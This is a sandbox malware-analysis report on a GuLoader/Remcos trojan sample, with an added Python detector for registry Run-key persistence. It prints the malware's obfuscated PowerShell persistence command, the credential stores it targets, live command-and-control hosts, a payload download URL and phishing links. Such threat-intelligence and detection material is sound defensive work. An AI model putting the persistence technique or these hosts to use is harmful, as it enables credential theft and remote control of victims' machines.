Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 13_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 13_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 13_2_00402DB3
Source: Yara match File source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR

              Remote Access Functionality

              barindex
Source: Yara match File source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
MITRE ATT&CK Matrix (a number in front of a technique is the count of matched signatures mapped to it)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 11 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 112 Command and Scripting Interpreter | Logon Script (Windows) | 212 Process Injection | 1 Software Packing | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Credentials In Files | 19 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 221 Security Software Discovery | SSH | 2 Clipboard Data | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1428880, Sample: z14Novospedidosdecompra_Pro..., Startdate: 19/04/2024, Architecture: WINDOWS, Score: 100

Process tree and annotations recovered from the behavior graph (the graph image itself is not reproduced here):

Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Antivirus detection for URL or domain; 11 other signatures
Contacted domains: learfo55ozj01.duckdns.org (Uses dynamic DNS services); ricohltd.top; geoplugin.net

z14Novospedidosdecompra_Profil_4903.exe (started)
  dropped: C:\Users\user\AppData\...\Kursusplans.Fje, ASCII
  signatures: Suspicious powershell command line found
  -> powershell.exe (started)
     dropped: z14Novospedidosdecompra_Profil_4903.exe, PE32
     signatures: Obfuscated command line found; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures
     -> wab.exe (started)
        network: learfo55ozj01.duckdns.org 193.222.96.21, ports 29871, 49738, 49739, SWISSCOM Swisscom Switzerland Ltd CH, Germany; ricohltd.top 104.21.60.38, ports 443, 49737, CLOUDFLARENET US, United States; geoplugin.net 178.237.33.50, ports 49740, 80, ATOM86-AS ATOM86 NL, Netherlands
        dropped: C:\Users\user\AppData\Roaming\mqerms.dat, data
        signatures: Maps a DLL or memory area into another process; Hides threads from debuggers; Installs a global keyboard hook
        -> wab.exe (started): Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
        -> wab.exe (started): Tries to steal Mail credentials (via file / registry access)
        -> wab.exe (started)
        -> 2 other processes: conhost.exe (started); reg.exe (started)
     -> conhost.exe (started)
     -> cmd.exe (started)

Source | Detection | Scanner | Label
z14Novospedidosdecompra_Profil_4903.exe | 58% | ReversingLabs | Win32.Trojan.GuLoader
z14Novospedidosdecompra_Profil_4903.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe | 58% | ReversingLabs | Win32.Trojan.GuLoader

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://www.imvu.comr | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
https://contoso.com/ | 0% | URL Reputation | safe
http://www.ebuddy.com | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
learfo55ozj01.duckdns.org | 193.222.96.21 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
ricohltd.top | 104.21.60.38 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
learfo55ozj01.duckdns.org | true | | unknown
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
https://ricohltd.top/PIoDroeALMbPB243.bin | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gpd | wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.comr | wab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpg | wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpi | wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.imvu.com | wab.exe | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpr | wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nsis.sf.net/NSIS_ErrorError | z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000000.1666780592.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://geoplugin.net/json.gp09 | wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ricohltd.top/PIoDroeALMbPB243.binn | wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gpz | wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmp | false | | unknown
https://ricohltd.top/ | wab.exe, 00000007.00000002.2939812066.00000000096F8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com | wab.exe | false | | high
http://geoplugin.net/ | wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gpE | wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmp | false |
                                                          unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2394581791.0000000005061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/accounts/serviceloginwab.exefalse
                                                                high
                                                                https://login.yahoo.com/config/loginwab.exefalse
                                                                  high
                                                                  https://ricohltd.top/PIoDroeALMbPB243.binBwab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.nirsoft.net/wab.exefalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2394581791.0000000005061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.ebuddy.comwab.exefalse
                                                                        • URL Reputation: safe
                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.60.38 | ricohltd.top | United States | 13335 | CLOUDFLARENET (US) | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-AS ATOM86 (NL) | false
193.222.96.21 | learfo55ozj01.duckdns.org | Germany | 3303 | SWISSCOM Swisscom Switzerland Ltd (CH) | true
                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                        Analysis ID:1428880
                                                                        Start date and time:2024-04-19 19:10:07 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 16s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:z14Novospedidosdecompra_Profil_4903.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@21/15@3/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 94%
                                                                        • Number of executed functions: 193
                                                                        • Number of non-executed functions: 286
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6452 because it is empty
                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • VT rate limit hit for: z14Novospedidosdecompra_Profil_4903.exe
Time | Type | Description
18:12:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)
18:12:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)
19:10:59 | API Interceptor | 44x Sleep call for process: powershell.exe modified
19:12:43 | API Interceptor | 75x Sleep call for process: wab.exe modified
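The Run-key entry in the timeline above is the GuLoader persistence pattern worth hunting for on other hosts: the launcher is hidden behind an environment variable (%Slettelsers%), the window is minimized, and the script body is not on disk at all but read from a second HKCU value (Forsorgspdagog\Skeletoverstter) and then executed. The detector below is an added example, not part of the Joe Sandbox report; the four event records are constructed to resemble Sysmon Event ID 13 (registry value set), the scoring weights and regexes are the author's own heuristics, and the key and value names it extracts are whatever the Run-key command line references.

```python
"""Score Run-key values for the 'script body stored in the registry' persistence pattern.
Added example; events are constructed, scoring is heuristic."""
import re

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
ENV_BIN = re.compile(r"^\s*%[^%\s]+%")                  # "%Slettelsers% ..." instead of a binary path
HIDDEN = re.compile(r"-w\w*\s+(?:minimized|hidden|1|2)\b", re.I)   # -windowstyle minimized / -w hidden
REG_BODY = re.compile(                                   # (Get-ItemProperty -Path 'KEY').VALUE
    r"Get-ItemProperty\s+-Path\s+['\"](?P<key>[^'\"]+)['\"]\s*\)\.(?P<value>\w+)", re.I)
INVOKE = re.compile(r"\$(?P<var>\w+)\s*=.*;\s*\S+\s*\(\s*\$(?P=var)\s*\)", re.S)  # $x=...; cmd ($x)

# Constructed Sysmon-style events. The first Details string is the one recorded in this report.
EVENTS = [
    {"EventID": 13, "Image": "powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Startup key",
     "Details": r"%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"},
    {"EventID": 13, "Image": "OneDriveSetup.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"EventID": 13, "Image": "powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Backup",
     "Details": r"powershell.exe -w hidden -File C:\Scripts\backup.ps1"},
    {"EventID": 13, "Image": "svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]


def score_run_value(details):
    """Return (score, reasons, payload_ref) for one Run-key command line.
    payload_ref is the (registry key, value name) the script body is read from, if any."""
    score, reasons, payload = 0, [], None
    if ENV_BIN.search(details):
        score += 1; reasons.append("launcher referenced via environment variable")
    if HIDDEN.search(details):
        score += 1; reasons.append("hidden or minimized window")
    m = REG_BODY.search(details)
    if m:
        score += 2; reasons.append("script body read from a registry value")
        payload = (m["key"], m["value"])
    if INVOKE.search(details):
        score += 1; reasons.append("fetched value is passed back to the interpreter")
    return score, reasons, payload


def hunt(events, threshold=3):
    """Alert on Run/RunOnce value-set events whose command line scores >= threshold.
    'collect' tells the responder which registry value to acquire before it is wiped."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13 or not RUN_KEY.search(ev["TargetObject"]):
            continue
        score, reasons, payload = score_run_value(ev["Details"])
        if score >= threshold:
            alerts.append({"target": ev["TargetObject"], "score": score,
                           "reasons": reasons, "collect": payload})
    return alerts


if __name__ == "__main__":
    for a in hunt(EVENTS):
        print(a["score"], a["target"], a["collect"], "; ".join(a["reasons"]))
```

Only the report's entry scores high enough to alert (5 of a possible 5); the plain hidden-window backup script scores 1, which is why the threshold sits at 3 rather than on any single indicator. The returned `collect` tuple matters for response: the actual payload lives in that value, so export it before remediation deletes the Run key.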
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.60.38 | COPY.doc | malicious | Unknown | ricohltd.top/pages/microzx.scr
104.21.60.38 | 93Vc4lrukRxn3WG.exe | malicious | FormBook | www.peacemyanmar.com/c8ec/?i2Jx-=JbnHKQNA4AubQ4cSTRqCUjsV30iNMKVb/qiRb+TdpY0tAokv3PP5G3/qX2Zn4Kqzke2C&3fb=t8Cle8U
178.237.33.50 | SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | UMMAN İHRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | Invoice No. 03182024.docx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | AWB DOCUMENT.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | 2020.xls | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | tu.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | RFQ.NO. S70-23Q-1474-CS-P.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | F873635427.vbs | malicious | Remcos, XWorm | geoplugin.net/json.gp
193.222.96.21 | UMMAN İHRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | Scanned Docs~SHYD-231214453~YD-B8243 70-30~CFR~Drums.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | documents 53 ACH 775-53 ABM 912.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | MDU9342434.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | C3441067 Non Interventional Protocol Abstract_08Feb2024.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | 3250391200054 - EU14303 COTTERLEY Thé Noir Darjeeling.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | GOZDE BAYRAKTAR DH404R POTI CSV LOADING ORDERS.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | 1151_AZKOND_-_KELBECER_30.01.2024.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | copesetic_glasrr.exe | malicious | GuLoader, Remcos | -
193.222.96.21 | B4pdM0gRs3.exe | malicious | GuLoader, Remcos | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
learfo55ozj01.duckdns.org | UMMAN İHRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | Scanned Docs~SHYD-231214453~YD-B8243 70-30~CFR~Drums.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | documents 53 ACH 775-53 ABM 912.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | MDU9342434.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | C3441067 Non Interventional Protocol Abstract_08Feb2024.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | 3250391200054 - EU14303 COTTERLEY Thé Noir Darjeeling.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | GOZDE BAYRAKTAR DH404R POTI CSV LOADING ORDERS.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | 1151_AZKOND_-_KELBECER_30.01.2024.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | copesetic_glasrr.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj01.duckdns.org | B4pdM0gRs3.exe | malicious | GuLoader, Remcos | 193.222.96.21
ricohltd.top | UMMAN İHRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | 172.67.191.112
ricohltd.top | COPY.doc | malicious | Unknown | 104.21.60.38
geoplugin.net | SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | UMMAN İHRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | Invoice No. 03182024.docx | malicious | Remcos | 178.237.33.50
geoplugin.net | AWB DOCUMENT.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5 | malicious | Remcos | 178.237.33.50
geoplugin.net | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | 2020.xls | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | tu.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | RFQ.NO. S70-23Q-1474-CS-P.vbs | malicious | Remcos, GuLoader | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SWISSCOM Swisscom Switzerland Ltd (CH) | UMMAN İHRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | 193.222.96.21
SWISSCOM Swisscom Switzerland Ltd (CH) | wFtZih4nN9.elf | malicious | Mirai | 85.7.65.219
SWISSCOM Swisscom Switzerland Ltd (CH) | dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbs | malicious | GuLoader, Remcos | 193.222.96.11
SWISSCOM Swisscom Switzerland Ltd (CH) | http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ | malicious | HTMLPhisher | 193.222.96.132
SWISSCOM Swisscom Switzerland Ltd (CH) | enEQvjUlGl.elf | malicious | Mirai | 178.194.189.44
SWISSCOM Swisscom Switzerland Ltd (CH) | Oo2yeTdq5J.elf | malicious | Mirai | 85.2.40.128
SWISSCOM Swisscom Switzerland Ltd (CH) | 3OcPSlVa7n.elf | malicious | Mirai | 161.78.204.214
SWISSCOM Swisscom Switzerland Ltd (CH) | rc21AW1MZD.elf | malicious | Mirai | 164.195.100.221
SWISSCOM Swisscom Switzerland Ltd (CH) | hYN45tzxwl.elf | malicious | Mirai | 164.208.232.102
SWISSCOM Swisscom Switzerland Ltd (CH) | x86.elf | malicious | Mirai | 164.209.76.204
CLOUDFLARENET (US) | https://wetransfer.com/downloads/63408c72b6333965afb0118ce81f53d220240419112437/2452e85458854b24e1ec42e87285f82420240419112457/7d30d1?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgrid | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENET (US) | https://edbullardcompany-my.sharepoint.com/:f:/g/personal/eric_rosario_bullard_com/EoLKvcaqSE1Go3fA5to5CQABtxAftKTD0ktrakp7rbi4Xg?e=Mvbf0D | malicious | HTMLPhisher | 172.64.41.3
CLOUDFLARENET (US) | SecuriteInfo.com.W32.ABRisk.NVJI-4581.31168.9649.exe | malicious | Unknown | 104.21.75.43
CLOUDFLARENET (US) | SecuriteInfo.com.W32.ABRisk.NVJI-4581.31168.9649.exe | malicious | Unknown | 172.67.213.82
CLOUDFLARENET (US) | PO-095325.scr.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENET (US) | https://docx-nok.online/ | malicious | HtmlDropper, HTMLPhisher | 172.67.179.148
CLOUDFLARENET (US) | https://download-myproposal.xyz | malicious | HtmlDropper, HTMLPhisher | 104.17.2.184
CLOUDFLARENET (US) | SenPalia.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENET (US) | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 172.67.74.152
CLOUDFLARENET (US) | https://royaltattoo.in/js/kalexander@yourlawyer.com | malicious | Phisher | 104.17.25.14
ATOM86-AS ATOM86 (NL) | SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-AS ATOM86 (NL) | UMMAN İHRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-AS ATOM86 (NL) | Invoice No. 03182024.docx | malicious | Remcos | 178.237.33.50
